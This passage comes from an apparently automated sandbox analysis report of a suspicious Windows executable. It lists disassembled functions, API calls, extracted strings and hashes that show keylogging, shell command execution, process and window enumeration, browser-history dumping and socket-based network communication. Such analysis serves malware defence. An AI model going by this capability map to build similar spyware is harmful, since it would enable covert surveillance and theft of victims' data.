                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID:
                        • API String ID: 313313983-0
                        • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                        • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                        • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                        • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                        Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                        • _free.LIBCMT ref: 0044E1B0
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                        • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                        • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                        • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                        Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                        • _free.LIBCMT ref: 00446F8D
                        • _free.LIBCMT ref: 00446FB4
                        • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                        • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                        • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                        • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                        • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                        Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 0044F7C5
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 0044F7D7
                        • _free.LIBCMT ref: 0044F7E9
                        • _free.LIBCMT ref: 0044F7FB
                        • _free.LIBCMT ref: 0044F80D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                        • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                        • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                        Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00443315
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00443327
                        • _free.LIBCMT ref: 0044333A
                        • _free.LIBCMT ref: 0044334B
                        • _free.LIBCMT ref: 0044335C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                        • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                        • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                        Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                        • IsWindowVisible.USER32(?), ref: 004167A1
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessWindow$Open$TextThreadVisible
                        • String ID: (FG
                        • API String ID: 3142014140-2273637114
                        • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                        • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                        • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                        • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                        Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                        Download Yara Rule
                        APIs
                        • _strpbrk.LIBCMT ref: 0044D4B8
                        • _free.LIBCMT ref: 0044D5D5
                          • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                          • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                          • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
                        • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                        • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                        • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                        • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                        Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                          • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                        • String ID: XCG$`AG$>G
                        • API String ID: 2334542088-2372832151
                        • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                        • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                        • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                        • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                        Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000104), ref: 00442724
                        • _free.LIBCMT ref: 004427EF
                        • _free.LIBCMT ref: 004427F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe
                        • API String ID: 2506810119-52253571
                        • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                        • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                        • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                        • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                        Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "$8>G
                        • API String ID: 368326130-2663660666
                        • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                        • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                        • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                        • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                        Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                        • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        • Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                        • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                        • Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                        • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                        Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        • Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                        • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                        • Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                        • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                        Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                        • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                        • __dosmaperr.LIBCMT ref: 0044AB0E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseErrorHandleLast__dosmaperr
                        • String ID: `@
                        • API String ID: 2583163307-951712118
                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                        • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                        • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                        Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        • Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                        • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                        • Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                        • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                        Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                        • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                        • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                        • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                        Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        • Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                        • Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                        Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                        Download Yara Rule
                        APIs
                        • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                        • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: TerminateThread$HookUnhookWindows
                        • String ID: pth_unenc
                        • API String ID: 3123878439-4028850238
                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                        Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll
                        • API String ID: 1646373207-2714051624
                        • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                        • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                        • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                        • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                        Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                        • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                        • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                        • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                        Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                        • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                        • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                        • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                        Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                        • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                        • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                        • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                        Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                        • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                        • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                        • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                        Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                        Memory Dump Source
